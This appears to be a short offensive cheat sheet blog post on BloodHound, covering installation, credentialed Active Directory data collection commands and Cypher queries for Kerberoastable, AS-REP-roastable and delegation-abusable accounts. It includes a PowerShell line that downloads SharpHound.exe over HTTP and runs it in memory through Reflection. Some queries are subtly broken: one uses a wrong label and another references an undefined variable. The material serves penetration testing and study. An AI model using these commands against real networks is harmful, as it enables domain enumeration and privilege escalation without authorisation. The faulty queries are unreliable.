Post

Bloodhoound

Posted Updated
Preview Image
By
1 min read
Bloodhoound

Bloodhound

BloodHound is an open-source tool that uses graph theory to visually map and analyze the relationships and permissions between objects (like users, groups, and computers).

Installtion Guide

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

cd /opt
# Bloodhound Directory Creation
mkdir bloodhound

# Installing Docker-Compose
sudo apt install docker.io && sudo apt install docker-compose
# Add user to run Docker Containers without Priv
sudo usermod -aG docker  $USER
# Installing Bloodhound File
curl -L https://ghst.ly/getbhce > docker-compose.yml

# Start Bloodhound Container
sudo docker-compose pull && docker-compose up

http://localhost:8080/

# Greb Intial Password from the log's from Screen

# Login creds
admin:<Initial_Passwords>

Bloodhound loot Collection

1
2
3
4
5
6
7
8
9
10
11
12

NetExec ldap $TARGET -u '$user' -p '$pass' --bloodhound --collection All --dns-server $TARGET -d $Domain
bloodhound-python -d $Domain -u '$user' -p '$pass' -ns $IP -dc $Full_Domain -c All --zip
bloodyAD --host $TARGET -d $Domin -u $user -p '$pass' get bloodhound --transitive --path .
rusthound --domain $Domain -u '$user' -p '$pass' --zip


.\sharpHound.exe -s -c all,gpolocalgroup

> # Execute Sharphound in memory
$data = (New-Object System.Net.WebClient).DownloadData('http://$TARGET:$PORT/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("--collectionmethods All --domain $Domain_Name --searchforest true --outputdirectory c:\users\public\ --zipfilename Bloodhound.zip".Split())

Custom Queries

List all Users

1

Match (n:User) RETURN n

List all computers

1

Match (n:Computers) RETURN n

List all Kerberoastable Users

1
2
3
4
5

MATCH (n:User)WHERE n.hasspn=true
RETURN n

MATCH (n:User {hasspn: true}) WHERE NOT n.name STARTS WITH 'KRBTGT' 
RETURN n

List all As-Reproastable Users

1
2
3
4
5

MATCH (n:User)WHERE n.dontreqpreauth=true 
RETURN n   

MATCH (n:User {dontreqpreauth: true, enabled: true}) 
RETURN n

Delegation Attacks

Unconstrained Delegation

1
2
3
4
5
6
7

# By Computer
MATCH (n:Computer {unconstraineddelegation:true}) 
return n

# By Users
MATCH (n:User {allowedtodelegate: true}) 
RETURN n

Constrained Delegation

1
2

MATCH (n {allowedtodelegate: true}) 
RETURN n

Resource-Based Constrained Delegation

1
2

MATCH (n:Computer) WHERE EXISTS(c.allowedtoact) 
RETURN n
AD- Attacks
bloodhound
This post is licensed under CC BY 4.0 by the author.